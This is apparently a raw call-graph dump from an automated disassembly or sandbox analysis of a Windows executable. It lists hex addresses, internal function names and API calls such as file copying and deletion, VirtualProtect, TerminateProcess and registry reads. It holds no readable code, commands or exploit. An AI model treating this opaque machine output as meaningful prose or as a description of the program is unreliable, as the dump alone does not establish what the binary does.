96642->96645 96643 dd53c4 __wsopen_s 26 API calls 96646 dd8702 CloseHandle 96643->96646 96644 dd871c 96647 dd873e 96644->96647 96668 dcf2a3 20 API calls __dosmaperr 96644->96668 96648 dd53c4 __wsopen_s 26 API calls 96645->96648 96646->96640 96649 dd870e GetLastError 96646->96649 96647->96633 96648->96651 96649->96640 96651->96640 96651->96643 96652->96633 96653->96635 96655 dd53e6 96654->96655 96656 dd53d1 96654->96656 96662 dd540b 96655->96662 96671 dcf2c6 20 API calls __dosmaperr 96655->96671 96669 dcf2c6 20 API calls __dosmaperr 96656->96669 96659 dd53d6 96670 dcf2d9 20 API calls __dosmaperr 96659->96670 96660 dd5416 96672 dcf2d9 20 API calls __dosmaperr 96660->96672 96662->96639 96664 dd53de 96664->96639 96665 dd541e 96673 dd27ec 26 API calls pre_c_initialization 96665->96673 96667->96644 96668->96647 96669->96659 96670->96664 96671->96660 96672->96665 96673->96664 96674->96481 96676 da7525 96675->96676 96692 da7522 96675->96692 96677 da755b 96676->96677 96678 da752d 96676->96678 96680 de500f 96677->96680 96681 da756d 96677->96681 96688 de50f6 96677->96688 96727 dc51c6 26 API calls 96678->96727 96691 dbfe0b 22 API calls 96680->96691 96695 de5088 96680->96695 96728 dbfb21 51 API calls 96681->96728 96682 da753d 96687 dbfddb 22 API calls 96682->96687 96685 de510e 96685->96685 96689 da7547 96687->96689 96730 dc5183 26 API calls 96688->96730 96690 da9cb3 22 API calls 96689->96690 96690->96692 96694 de5058 96691->96694 96698 da9e90 96692->96698 96693 dbfddb 22 API calls 96696 de507f 96693->96696 96694->96693 96729 dbfb21 51 API calls 96695->96729 96697 da9cb3 22 API calls 96696->96697 96697->96695 96731 da6270 96698->96731 96700 da9fd2 96737 daa4a1 96700->96737 96702 da9fec 96702->96281 96705 daa6c3 22 API calls 96725 da9eb5 96705->96725 96706 def7c4 96749 e096e2 84 API calls __wsopen_s 96706->96749 96707 def699 96712 dbfddb 22 API calls 96707->96712 96708 daa405 96708->96702 96750 e096e2 84 API calls __wsopen_s 96708->96750 96714 def754 96712->96714 96713 def7d2 96715 daa4a1 22 API calls 96713->96715 96717 dbfe0b 22 API calls 96714->96717 96716 def7e8 96715->96716 96716->96702 96718 daa12c __fread_nolock 96717->96718 96718->96706 96718->96708 96720 daa587 22 API calls 96720->96725 96721 daa4a1 22 API calls 96721->96725 96722 daaec9 22 API calls 96723 daa0db CharUpperBuffW 96722->96723 96745 daa673 22 API calls 96723->96745 96725->96700 96725->96705 96725->96706 96725->96707 96725->96708 96725->96718 96725->96720 96725->96721 96725->96722 96736 da4573 41 API calls _wcslen 96725->96736 96746 da48c8 23 API calls 96725->96746 96747 da49bd 22 API calls __fread_nolock 96725->96747 96748 daa673 22 API calls 96725->96748 96726->96285 96727->96682 96728->96682 96729->96688 96730->96685 96732 dbfe0b 22 API calls 96731->96732 96733 da6295 96732->96733 96734 dbfddb 22 API calls 96733->96734 96735 da62a3 96734->96735 96735->96725 96736->96725 96739 daa52b 96737->96739 96743 daa4b1 __fread_nolock 96737->96743 96738 dbfddb 22 API calls 96740 daa4b8 96738->96740 96741 dbfe0b 22 API calls 96739->96741 96742 dbfddb 22 API calls 96740->96742 96744 daa4d6 96740->96744 96741->96743 96742->96744 96743->96738 96744->96702 96745->96725 96746->96725 96747->96725 96748->96725 96749->96713 96750->96702 96752 da7510 53 API calls 96751->96752 96753 e27f90 96752->96753 96758 e27fd5 messages 96753->96758 96789 e28cd3 96753->96789 96755 e2844f 96830 e28ee4 60 API calls 96755->96830 96758->96288 96759 e2845e 96761 e2828f 96759->96761 96762 e2846a 96759->96762 96760 e28049 96760->96758 96763 da7510 53 API calls 96760->96763 96776 e28281 96760->96776 96821 e0417d 22 API calls __fread_nolock 96760->96821 96822 e2851d 42 API calls _strftime 96760->96822 96802 e27e86 96761->96802 96762->96758 96763->96760 96768 e282c8 96817 dbfc70 96768->96817 96771 e28302 96824 da63eb 22 API calls 96771->96824 96772 e282e8 96823 e1359c 82 API calls __wsopen_s 96772->96823 96775 e282f3 GetCurrentProcess TerminateProcess 96775->96771 96776->96755 96776->96761 96777 e28311 96825 da6a50 22 API calls 96777->96825 96779 e2832a 96787 e28352 96779->96787 96826 db04f0 22 API calls 96779->96826 96781 e284c5 96781->96758 96785 e284d9 FreeLibrary 96781->96785 96782 e28341 96827 e28b7b 75 API calls 96782->96827 96785->96758 96787->96781 96828 db04f0 22 API calls 96787->96828 96829 daaceb 23 API calls messages 96787->96829 96831 e28b7b 75 API calls 96787->96831 96790 daaec9 22 API calls 96789->96790 96791 e28cee CharLowerBuffW 96790->96791 96832 e08e54 96791->96832 96795 daa961 22 API calls 96796 e28d2a 96795->96796 96839 da6d25 96796->96839 96798 e28d3e 96799 da93b2 22 API calls 96798->96799 96801 e28d48 _wcslen 96799->96801 96800 e28e5e _wcslen 96800->96760 96801->96800 96852 e2851d 42 API calls _strftime 96801->96852 96803 e27ea1 96802->96803 96807 e27eec 96802->96807 96804 dbfe0b 22 API calls 96803->96804 96806 e27ec3 96804->96806 96805 dbfddb 22 API calls 96805->96806 96806->96805 96806->96807 96808 e29096 96807->96808 96809 e292ab messages 96808->96809 96816 e290ba _strcat _wcslen 96808->96816 96809->96768 96810 dab567 39 API calls 96810->96816 96811 dab6b5 39 API calls 96811->96816 96812 dab38f 39 API calls 96812->96816 96813 da7510 53 API calls 96813->96816 96814 dcea0c 21 API calls ___std_exception_copy 96814->96816 96816->96809 96816->96810 96816->96811 96816->96812 96816->96813 96816->96814 96855 e0efae 24 API calls _wcslen 96816->96855 96818 dbfc85 96817->96818 96819 dbfd1d VirtualProtect 96818->96819 96820 dbfceb 96818->96820 96819->96820 96820->96771 96820->96772 96821->96760 96822->96760 96823->96775 96824->96777 96825->96779 96826->96782 96827->96787 96828->96787 96829->96787 96830->96759 96831->96787 96834 e08e74 _wcslen 96832->96834 96833 e08f63 96833->96795 96833->96801 96834->96833 96835 e08f68 96834->96835 96836 e08ea9 96834->96836 96835->96833 96854 dbce60 41 API calls 96835->96854 96836->96833 96853 dbce60 41 API calls 96836->96853 96840 da6d91 96839->96840 96841 da6d34 96839->96841 96843 da93b2 22 API calls 96840->96843 96841->96840 96842 da6d3f 96841->96842 96844 da6d5a 96842->96844 96845 de4c9d 96842->96845 96849 da6d62 __fread_nolock 96843->96849 96847 da6f34 22 API calls 96844->96847 96846 dbfddb 22 API calls 96845->96846 96848 de4ca7 96846->96848 96847->96849 96850 dbfe0b 22 API calls 96848->96850 96849->96798 96851 de4cda 96850->96851 96852->96800 96853->96836 96854->96835 96855->96816 96857 e0d4d5 96856->96857 96858 e0dbdc GetFileAttributesW 96856->96858 96857->96213 96858->96857 96859 e0dbe8 FindFirstFileW 96858->96859 96859->96857 96860 e0dbf9 FindClose 96859->96860 96860->96857 97053 da4e90 LoadLibraryA 96861->97053 96866 de3ccf 96869 da4f39 68 API calls 96866->96869 96867 da4ef6 LoadLibraryExW 97061 da4e59 LoadLibraryA 96867->97061 96871 de3cd6 96869->96871 96873 da4e59 3 API calls 96871->96873 96875 de3cde 96873->96875 96874 da4f20 96874->96875 96876 da4f2c 96874->96876 97083 da50f5 96875->97083 96878 da4f39 68 API calls 96876->96878 96880 da4f31 96878->96880 96880->96310 96880->96311 96882 de3d05 96884 daa961 22 API calls 96883->96884 96885 da5275 96884->96885 96886 daa961 22 API calls 96885->96886 96887 da527d 96886->96887 96888 daa961 22 API calls 96887->96888 96889 da5285 96888->96889 96890 daa961 22 API calls 96889->96890 96891 da528d 96890->96891 96892 de3df5 96891->96892 96893 da52c1 96891->96893 96894 daa8c7 22 API calls 96892->96894 96895 da6d25 22 API calls 96893->96895 96896 de3dfe 96894->96896 96897 da52cf 96895->96897 96898 daa6c3 22 API calls 96896->96898 96899 da93b2 22 API calls 96897->96899 96901 da5304 96898->96901 96900 da52d9 96899->96900 96900->96901 96902 da6d25 22 API calls 96900->96902 96903 da5349 96901->96903 96904 da5325 96901->96904 96909 de3e20 96901->96909 96906 da52fa 96902->96906 96905 da6d25 22 API calls 96903->96905 96904->96903 96911 da4c6d 22 API calls 96904->96911 96907 da535a 96905->96907 96908 da93b2 22 API calls 96906->96908 96910 da5370 96907->96910 96915 daa8c7 22 API calls 96907->96915 96908->96901 96914 da6b57 22 API calls 96909->96914 96912 da5384 96910->96912 96918 daa8c7 22 API calls 96910->96918 96913 da5332 96911->96913 96916 da538f 96912->96916 96919 daa8c7 22 API calls 96912->96919 96913->96903 96917 da6d25 22 API calls 96913->96917 96922 de3ee0 96914->96922 96915->96910 96920 daa8c7 22 API calls 96916->96920 96923 da539a 96916->96923 96917->96903 96918->96912 96919->96916 96920->96923 96921 da4c6d 22 API calls 96921->96922 96922->96903 96922->96921 97223 da49bd 22 API calls __fread_nolock 96922->97223 96923->96345 96926 daaec9 22 API calls 96925->96926 96927 da4c78 96926->96927 96927->96350 96927->96352 96929 da6362 96928->96929 96930 de4a51 96928->96930 97224 da6373 96929->97224 97234 da4a88 22 API calls __fread_nolock 96930->97234 96933 de4a5b 96935 daa8c7 22 API calls 96933->96935 96936 de4a67 96933->96936 96934 da636e 96934->96358 96935->96936 96938 e0d7d8 96937->96938 96939 e0d7f3 96938->96939 96940 e0d7dd 96938->96940 96941 daa961 22 API calls 96939->96941 96942 daa8c7 22 API calls 96940->96942 96990 e0d7ee 96940->96990 96943 e0d7fb 96941->96943 96942->96990 96944 daa961 22 API calls 96943->96944 96945 e0d803 96944->96945 96946 daa961 22 API calls 96945->96946 96947 e0d80e 96946->96947 96948 daa961 22 API calls 96947->96948 96949 e0d816 96948->96949 96950 daa961 22 API calls 96949->96950 96951 e0d81e 96950->96951 96952 daa961 22 API calls 96951->96952 96953 e0d826 96952->96953 96954 daa961 22 API calls 96953->96954 96955 e0d82e 96954->96955 96956 daa961 22 API calls 96955->96956 96957 e0d836 96956->96957 96958 da525f 22 API calls 96957->96958 96959 e0d84d 96958->96959 96960 da525f 22 API calls 96959->96960 96961 e0d866 96960->96961 96962 da4c6d 22 API calls 96961->96962 96963 e0d872 96962->96963 96964 e0d885 96963->96964 96965 da93b2 22 API calls 96963->96965 96966 da4c6d 22 API calls 96964->96966 96965->96964 96967 e0d88e 96966->96967 96968 e0d89e 96967->96968 96969 da93b2 22 API calls 96967->96969 96970 e0d8b0 96968->96970 96971 daa8c7 22 API calls 96968->96971 96969->96968 96972 da6350 22 API calls 96970->96972 96971->96970 96973 e0d8bb 96972->96973 97235 e0d978 22 API calls 96973->97235 96975 e0d8ca 97236 e0d978 22 API calls 96975->97236 96977 e0d8dd 96978 da4c6d 22 API calls 96977->96978 96979 e0d8e7 96978->96979 96980 e0d8ec 96979->96980 96981 e0d8fe 96979->96981 96982 da33c6 22 API calls 96980->96982 96983 da4c6d 22 API calls 96981->96983 96984 e0d8f9 96982->96984 96985 e0d907 96983->96985 96989 da6350 22 API calls 96984->96989 96986 e0d925 96985->96986 96988 da33c6 22 API calls 96985->96988 96987 da6350 22 API calls 96986->96987 96987->96990 96988->96984 96989->96986 96990->96367 96992 e12954 __wsopen_s 96991->96992 96993 dbfe0b 22 API calls 96992->96993 96994 e12971 96993->96994 96995 da5722 22 API calls 96994->96995 96996 e1297b 96995->96996 96997 e1274e 27 API calls 96996->96997 96998 e12986 96997->96998 96999 da511f 64 API calls 96998->96999 97000 e1299b 96999->97000 97001 e12a6c 97000->97001 97002 e129bf 97000->97002 97003 e12e66 75 API calls 97001->97003 97250 e12e66 97002->97250 97005 e12a38 97003->97005 97008 da50f5 40 API calls 97005->97008 97010 e12a75 messages 97005->97010 97009 e12a91 97008->97009 97011 da50f5 40 API calls 97009->97011 97010->96370 97013 e12aa1 97011->97013 97012 e129ed 97257 dcd583 26 API calls 97012->97257 97014 da50f5 40 API calls 97013->97014 97016 e12abc 97014->97016 97017 da50f5 40 API calls 97016->97017 97018 e12acc 97017->97018 97019 da50f5 40 API calls 97018->97019 97020 e12ae7 97019->97020 97021 da50f5 40 API calls 97020->97021 97022 e12af7 97021->97022 97023 da50f5 40 API calls 97022->97023 97024 e12b07 97023->97024 97025 da50f5 40 API calls 97024->97025 97026 e12b17 97025->97026 97237 e13017 GetTempPathW GetTempFileNameW 97026->97237 97028 e12b22 97029 dce5eb 29 API calls 97028->97029 97040 e12b33 97029->97040 97030 e12bed 97031 dce678 67 API calls 97030->97031 97032 e12bf8 97031->97032 97034 e12c12 97032->97034 97035 e12bfe DeleteFileW 97032->97035 97033 da50f5 40 API calls 97033->97040 97036 e12c91 CopyFileW 97034->97036 97042 e12c18 97034->97042 97035->97010 97037 e12ca7 DeleteFileW 97036->97037 97038 e12cb9 DeleteFileW 97036->97038 97037->97010 97247 e12fd8 CreateFileW 97038->97247 97040->97010 97040->97030 97040->97033 97238 dcdbb3 97040->97238 97258 e122ce 79 API calls 97042->97258 97044 e12c7c 97044->97038 97045 e12c80 DeleteFileW 97044->97045 97045->97010 97047 dab578 97046->97047 97048 dab57f 97046->97048 97047->97048 97305 dc62d1 39 API calls 97047->97305 97048->96300 97050 dab5c2 97050->96300 97051->96334 97052->96348 97054 da4ea8 GetProcAddress 97053->97054 97055 da4ec6 97053->97055 97056 da4eb8 97054->97056 97058 dce5eb 97055->97058 97056->97055 97057 da4ebf FreeLibrary 97056->97057 97057->97055 97091 dce52a 97058->97091 97060 da4eea 97060->96866 97060->96867 97062 da4e6e GetProcAddress 97061->97062 97063 da4e8d 97061->97063 97064 da4e7e 97062->97064 97066 da4f80 97063->97066 97064->97063 97065 da4e86 FreeLibrary 97064->97065 97065->97063 97067 dbfe0b 22 API calls 97066->97067 97068 da4f95 97067->97068 97069 da5722 22 API calls 97068->97069 97070 da4fa1 __fread_nolock 97069->97070 97071 de3d1d 97070->97071 97072 da50a5 97070->97072 97082 da4fdc 97070->97082 97163 e1304d 74 API calls 97071->97163 97152 da42a2 CreateStreamOnHGlobal 97072->97152 97075 de3d22 97077 da511f 64 API calls 97075->97077 97076 da50f5 40 API calls 97076->97082 97078 de3d45 97077->97078 97079 da50f5 40 API calls 97078->97079 97081 da506e messages 97079->97081 97081->96874 97082->97075 97082->97076 97082->97081 97158 da511f 97082->97158 97084 da5107 97083->97084 97085 de3d70 97083->97085 97185 dce8c4 97084->97185 97088 e128fe 97206 e1274e 97088->97206 97090 e12919 97090->96882 97093 dce536 __FrameHandler3::FrameUnwindToState 97091->97093 97092 dce544 97116 dcf2d9 20 API calls __dosmaperr 97092->97116 97093->97092 97095 dce574 97093->97095 97097 dce579 97095->97097 97098 dce586 97095->97098 97096 dce549 97117 dd27ec 26 API calls pre_c_initialization 97096->97117 97118 dcf2d9 20 API calls __dosmaperr 97097->97118 97108 dd8061 97098->97108 97102 dce58f 97103 dce595 97102->97103 97104 dce5a2 97102->97104 97119 dcf2d9 20 API calls __dosmaperr 97103->97119 97120 dce5d4 LeaveCriticalSection __fread_nolock 97104->97120 97105 dce554 __wsopen_s 97105->97060 97109 dd806d __FrameHandler3::FrameUnwindToState 97108->97109 97121 dd2f5e EnterCriticalSection 97109->97121 97111 dd807b 97122 dd80fb 97111->97122 97115 dd80ac __wsopen_s 97115->97102 97116->97096 97117->97105 97118->97105 97119->97105 97120->97105 97121->97111 97130 dd811e 97122->97130 97123 dd8177 97140 dd4c7d 97123->97140 97127 dd29c8 _free 20 API calls 97128 dd8189 97127->97128 97134 dd8088 97128->97134 97147 dd3405 11 API calls 2 library calls 97128->97147 97130->97123 97130->97134 97138 dc918d EnterCriticalSection 97130->97138 97139 dc91a1 LeaveCriticalSection 97130->97139 97131 dd81a8 97148 dc918d EnterCriticalSection 97131->97148 97135 dd80b7 97134->97135 97151 dd2fa6 LeaveCriticalSection 97135->97151 97137 dd80be 97137->97115 97138->97130 97139->97130 97145 dd4c8a __dosmaperr 97140->97145 97141 dd4cca 97150 dcf2d9 20 API calls __dosmaperr 97141->97150 97142 dd4cb5 RtlAllocateHeap 97143 dd4cc8 97142->97143 97142->97145 97143->97127 97145->97141 97145->97142 97149 dc4ead 7 API calls 2 library calls 97145->97149 97147->97131 97148->97134 97149->97145 97150->97143 97151->97137 97153 da42bc FindResourceExW 97152->97153 97157 da42d9 97152->97157 97154 de35ba LoadResource 97153->97154 97153->97157 97155 de35cf SizeofResource 97154->97155 97154->97157 97156 de35e3 LockResource 97155->97156 97155->97157 97156->97157 97157->97082 97159 da512e 97158->97159 97160 de3d90 97158->97160 97164 dcece3 97159->97164 97163->97075 97167 dceaaa 97164->97167 97166 da513c 97166->97082 97170 dceab6 __FrameHandler3::FrameUnwindToState 97167->97170 97168 dceac2 97180 dcf2d9 20 API calls __dosmaperr 97168->97180 97170->97168 97171 dceae8 97170->97171 97182 dc918d EnterCriticalSection 97171->97182 97172 dceac7 97181 dd27ec 26 API calls pre_c_initialization 97172->97181 97174 dceaf4 97183 dcec0a 62 API calls 2 library calls 97174->97183 97177 dceb08 97184 dceb27 LeaveCriticalSection __fread_nolock 97177->97184 97179 dcead2 __wsopen_s 97179->97166 97180->97172 97181->97179 97182->97174 97183->97177 97184->97179 97188 dce8e1 97185->97188 97187 da5118 97187->97088 97189 dce8ed __FrameHandler3::FrameUnwindToState 97188->97189 97190 dce92d 97189->97190 97191 dce925 __wsopen_s 97189->97191 97195 dce900 ___scrt_fastfail 97189->97195 97203 dc918d EnterCriticalSection 97190->97203 97191->97187 97194 dce937 97204 dce6f8 38 API calls 4 library calls 97194->97204 97201 dcf2d9 20 API calls __dosmaperr 97195->97201 97196 dce91a 97202 dd27ec 26 API calls pre_c_initialization 97196->97202 97199 dce94e 97205 dce96c LeaveCriticalSection __fread_nolock 97199->97205 97201->97196 97202->97191 97203->97194 97204->97199 97205->97191 97209 dce4e8 97206->97209 97208 e1275d 97208->97090 97212 dce469 97209->97212 97211 dce505 97211->97208 97213 dce48c 97212->97213 97214 dce478 97212->97214 97219 dce488 __alldvrm 97213->97219 97222 dd333f 11 API calls 2 library calls 97213->97222 97220 dcf2d9 20 API calls __dosmaperr 97214->97220 97216 dce47d 97221 dd27ec 26 API calls pre_c_initialization 97216->97221 97219->97211 97220->97216 97221->97219 97222->97219 97223->96922 97225 da6382 97224->97225 97231 da63b6 __fread_nolock 97224->97231 97226 de4a82 97225->97226 97227 da63a9 97225->97227 97225->97231 97229 dbfddb 22 API calls 97226->97229 97228 daa587 22 API calls 97227->97228 97228->97231 97230 de4a91 97229->97230 97232 dbfe0b 22 API calls 97230->97232 97231->96934 97233 de4ac5 __fread_nolock 97232->97233 97234->96933 97235->96975 97236->96977 97237->97028 97239 dcdbc1 97238->97239 97245 dcdbdd 97238->97245 97240 dcdbcd 97239->97240 97241 dcdbe3 97239->97241 97239->97245 97262 dcf2d9 20 API calls __dosmaperr 97240->97262 97259 dcd9cc 97241->97259 97244 dcdbd2 97263 dd27ec 26 API calls pre_c_initialization 97244->97263 97245->97040 97248 e13013 97247->97248 97249 e12fff SetFileTime CloseHandle 97247->97249 97248->97010 97249->97248 97253 e12e7a 97250->97253 97251 e128fe 27 API calls 97251->97253 97252 e129c4 97252->97010 97256 dcd583 26 API calls 97252->97256 97253->97251 97253->97252 97254 da50f5 40 API calls 97253->97254 97255 da511f 64 API calls 97253->97255 97254->97253 97255->97253 97256->97012 97257->97005 97258->97044 97264 dcd97b 97259->97264 97261 dcd9f0 97261->97245 97262->97244 97263->97245 97265 dcd987 __FrameHandler3::FrameUnwindToState 97264->97265 97272 dc918d EnterCriticalSection 97265->97272 97267 dcd995 97273 dcd9f4 97267->97273 97271 dcd9b3 __wsopen_s 97271->97261 97272->97267 97281 dd49a1 97273->97281 97279 dcd9a2 97280 dcd9c0 LeaveCriticalSection __fread_nolock 97279->97280 97280->97271 97282 dcd955 __fread_nolock 26 API calls 97281->97282 97283 dd49b0 97282->97283 97284 ddf89b __fread_nolock 26 API calls 97283->97284 97286 dd49b6 97284->97286 97285 dcda09 97290 dcda3a 97285->97290 97286->97285 97302 dd3820 21 API calls __dosmaperr 97286->97302 97288 dd4a15 97289 dd29c8 _free 20 API calls 97288->97289 97289->97285 97293 dcda4c 97290->97293 97296 dcda24 97290->97296 97291 dcda5a 97303 dcf2d9 20 API calls __dosmaperr 97291->97303 97293->97291 97293->97296 97297 dcda85 __fread_nolock 97293->97297 97294 dcda5f 97304 dd27ec 26 API calls pre_c_initialization 97294->97304 97301 dd4a56 62 API calls 97296->97301 97297->97296 97298 dcdc0b 62 API calls 97297->97298 97299 dcd955 __fread_nolock 26 API calls 97297->97299 97300 dd59be __wsopen_s 62 API calls 97297->97300 97298->97297 97299->97297 97300->97297 97301->97279 97302->97288 97303->97294 97304->97296 97305->97050 97306->96385 97307 dc03fb 97308 dc0407 __FrameHandler3::FrameUnwindToState 97307->97308 97336 dbfeb1 97308->97336 97310 dc040e 97311 dc0561 97310->97311 97314 dc0438 97310->97314 97363 dc083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97311->97363 97313 dc0568 97364 dc4e52 28 API calls _abort 97313->97364 97325 dc0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97314->97325 97347 dd247d 97314->97347 97316 dc056e 97365 dc4e04 28 API calls _abort 97316->97365 97320 dc0576 97321 dc0457 97324 dc04de 97328 dc04f3 97324->97328 97327 dc04d8 97325->97327 97359 dc4e1a 38 API calls 3 library calls 97325->97359 97355 dc0959 97327->97355 97360 dc0992 GetModuleHandleW 97328->97360 97330 dc04fa 97330->97313 97331 dc04fe 97330->97331 97332 dc0507 97331->97332 97361 dc4df5 28 API calls _abort 97331->97361 97362 dc0040 13 API calls 2 library calls 97332->97362 97335 dc050f 97335->97321 97337 dbfeba 97336->97337 97366 dc0698 IsProcessorFeaturePresent 97337->97366 97339 dbfec6 97367 dc2c94 10 API calls 3 library calls 97339->97367 97341 dbfecb 97342 dbfecf 97341->97342 97368 dd2317 97341->97368 97342->97310 97345 dbfee6 97345->97310 97349 dd2494 97347->97349 97348 dc0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97350 dc0451 97348->97350 97349->97348 97350->97321 97351 dd2421 97350->97351 97352 dd2450 97351->97352 97353 dc0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97352->97353 97354 dd2479 97353->97354 97354->97325 97419 dc2340 97355->97419 97358 dc097f 97358->97324 97359->97327 97360->97330 97361->97332 97362->97335 97363->97313 97364->97316 97365->97320 97366->97339 97367->97341 97372 ddd1f6 97368->97372 97371 dc2cbd 8 API calls 3 library calls 97371->97342 97375 ddd213 97372->97375 97376 ddd20f 97372->97376 97373 dc0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97374 dbfed8 97373->97374 97374->97345 97374->97371 97375->97376 97378 dd4bfb 97375->97378 97376->97373 97379 dd4c07 __FrameHandler3::FrameUnwindToState 97378->97379 97390 dd2f5e EnterCriticalSection 97379->97390 97381 dd4c0e 97391 dd50af 97381->97391 97383 dd4c1d 97389 dd4c2c 97383->97389 97404 dd4a8f 29 API calls 97383->97404 97386 dd4c27 97405 dd4b45 GetStdHandle GetFileType 97386->97405 97387 dd4c3d __wsopen_s 97387->97375 97406 dd4c48 LeaveCriticalSection _abort 97389->97406 97390->97381 97392 dd50bb __FrameHandler3::FrameUnwindToState 97391->97392 97393 dd50df 97392->97393 97394 dd50c8 97392->97394 97407 dd2f5e EnterCriticalSection 97393->97407 97415 dcf2d9 20 API calls __dosmaperr 97394->97415 97397 dd50cd 97416 dd27ec 26 API calls pre_c_initialization 97397->97416 97400 dd50d7 __wsopen_s 97400->97383 97401 dd50eb 97403 dd5117 97401->97403 97408 dd5000 97401->97408 97417 dd513e LeaveCriticalSection _abort 97403->97417 97404->97386 97405->97389 97406->97387 97407->97401 97409 dd4c7d __dosmaperr 20 API calls 97408->97409 97410 dd5012 97409->97410 97414 dd501f 97410->97414 97418 dd3405 11 API calls 2 library calls 97410->97418 97411 dd29c8 _free 20 API calls 97413 dd5071 97411->97413 97413->97401 97414->97411 97415->97397 97416->97400 97417->97400 97418->97410 97420 dc096c GetStartupInfoW 97419->97420 97420->97358 97421 da1033 97426 da4c91 97421->97426 97425 da1042 97427 daa961 22 API calls 97426->97427 97428 da4cff 97427->97428 97434 da3af0 97428->97434 97430 da4d9c 97432 da1038 97430->97432 97437 da51f7 22 API calls __fread_nolock 97430->97437 97433 dc00a3 29 API calls __onexit 97432->97433 97433->97425 97438 da3b1c 97434->97438 97437->97430 97439 da3b0f 97438->97439 97440 da3b29 97438->97440 97439->97430 97440->97439 97441 da3b30 RegOpenKeyExW 97440->97441 97441->97439 97442 da3b4a RegQueryValueExW 97441->97442 97443 da3b6b 97442->97443 97444 da3b80 RegCloseKey 97442->97444 97443->97444 97444->97439 97445 df3f75 97456 dbceb1 97445->97456 97447 df3f8b 97448 df4006 97447->97448 97523 dbe300 23 API calls 97447->97523 97465 dabf40 97448->97465 97451 df3fe6 97452 df4052 97451->97452 97524 e11abf 22 API calls 97451->97524 97454 df4a88 97452->97454 97525 e1359c 82 API calls __wsopen_s 97452->97525 97457 dbcebf 97456->97457 97458 dbced2 97456->97458 97526 daaceb 23 API calls messages 97457->97526 97460 dbced7 97458->97460 97461 dbcf05 97458->97461 97462 dbfddb 22 API calls 97460->97462 97527 daaceb 23 API calls messages 97461->97527 97464 dbcec9 97462->97464 97464->97447 97528 daadf0 97465->97528 97467 dabf9d 97468 dabfa9 97467->97468 97469 df04b6 97467->97469 97471 df04c6 97468->97471 97472 dac01e 97468->97472 97547 e1359c 82 API calls __wsopen_s 97469->97547 97548 e1359c 82 API calls __wsopen_s 97471->97548 97533 daac91 97472->97533 97475 df04f5 97493 df055a 97475->97493 97549 dbd217 235 API calls 97475->97549 97476 dac7da 97481 dbfe0b 22 API calls 97476->97481 97478 e07120 22 API calls 97485 dac039 __fread_nolock messages 97478->97485 97486 dac808 __fread_nolock 97481->97486 97485->97475 97485->97476 97485->97478 97485->97486 97488 daaf8a 22 API calls 97485->97488 97489 df091a 97485->97489 97490 dbfddb 22 API calls 97485->97490 97485->97493 97494 daec40 235 API calls 97485->97494 97495 df08a5 97485->97495 97499 df0591 97485->97499 97500 df08f6 97485->97500 97505 dac237 97485->97505 97508 dbfe0b 22 API calls 97485->97508 97510 dac603 97485->97510 97517 df09bf 97485->97517 97520 dabbe0 40 API calls 97485->97520 97537 daad81 97485->97537 97552 e07099 22 API calls __fread_nolock 97485->97552 97553 e25745 54 API calls _wcslen 97485->97553 97554 dbaa42 22 API calls messages 97485->97554 97555 e0f05c 40 API calls 97485->97555 97556 daa993 41 API calls 97485->97556 97557 daaceb 23 API calls messages 97485->97557 97487 dbfe0b 22 API calls 97486->97487 97512 dac350 __fread_nolock messages 97487->97512 97488->97485 97560 e13209 23 API calls 97489->97560 97490->97485 97493->97510 97550 e1359c 82 API calls __wsopen_s 97493->97550 97494->97485 97496 daec40 235 API calls 97495->97496 97497 df08cf 97496->97497 97497->97510 97558 daa81b 41 API calls 97497->97558 97551 e1359c 82 API calls __wsopen_s 97499->97551 97559 e1359c 82 API calls __wsopen_s 97500->97559 97507 dac253 97505->97507 97509 daa8c7 22 API calls 97505->97509 97511 df0976 97507->97511 97515 dac297 messages 97507->97515 97508->97485 97509->97507 97510->97452 97561 daaceb 23 API calls messages 97511->97561 97522 dac3ac 97512->97522 97546 dbce17 22 API calls messages 97512->97546 97515->97517 97544 daaceb 23 API calls messages 97515->97544 97517->97510 97562 e1359c 82 API calls __wsopen_s 97517->97562 97518 dac335 97518->97517 97519 dac342 97518->97519 97545 daa704 22 API calls messages 97519->97545 97520->97485 97522->97452 97523->97451 97524->97448 97525->97454 97526->97464 97527->97464 97529 daae01 97528->97529 97532 daae1c messages 97528->97532 97530 daaec9 22 API calls 97529->97530 97531 daae09 CharUpperBuffW 97530->97531 97531->97532 97532->97467 97534 daacae 97533->97534 97535 daacd1 97534->97535 97563 e1359c 82 API calls __wsopen_s 97534->97563 97535->97485 97538 defadb 97537->97538 97539 daad92 97537->97539 97540 dbfddb 22 API calls 97539->97540 97541 daad99 97540->97541 97564 daadcd 97541->97564 97544->97518 97545->97512 97546->97512 97547->97471 97548->97510 97549->97493 97550->97510 97551->97510 97552->97485 97553->97485 97554->97485 97555->97485 97556->97485 97557->97485 97558->97500 97559->97510 97560->97505 97561->97517 97562->97510 97563->97535 97568 daaddd 97564->97568 97565 daadb6 97565->97485 97566 dbfddb 22 API calls 97566->97568 97567 daa961 22 API calls 97567->97568 97568->97565 97568->97566 97568->97567 97569 daa8c7 22 API calls 97568->97569 97570 daadcd 22 API calls 97568->97570 97569->97568 97570->97568 97571 da3156 97574 da3170 97571->97574 97575 da3187 97574->97575 97576 da31eb 97575->97576 97577 da318c 97575->97577 97613 da31e9 97575->97613 97581 de2dfb 97576->97581 97582 da31f1 97576->97582 97578 da3199 97577->97578 97579 da3265 PostQuitMessage 97577->97579 97584 de2e7c 97578->97584 97585 da31a4 97578->97585 97604 da316a 97579->97604 97580 da31d0 DefWindowProcW 97580->97604 97630 da18e2 10 API calls 97581->97630 97586 da31f8 97582->97586 97587 da321d SetTimer RegisterWindowMessageW 97582->97587 97644 e0bf30 34 API calls ___scrt_fastfail 97584->97644 97591 da31ae 97585->97591 97592 de2e68 97585->97592 97588 de2d9c 97586->97588 97589 da3201 KillTimer 97586->97589 97593 da3246 CreatePopupMenu 97587->97593 97587->97604 97601 de2dd7 MoveWindow 97588->97601 97602 de2da1 97588->97602 97626 da30f2 Shell_NotifyIconW ___scrt_fastfail 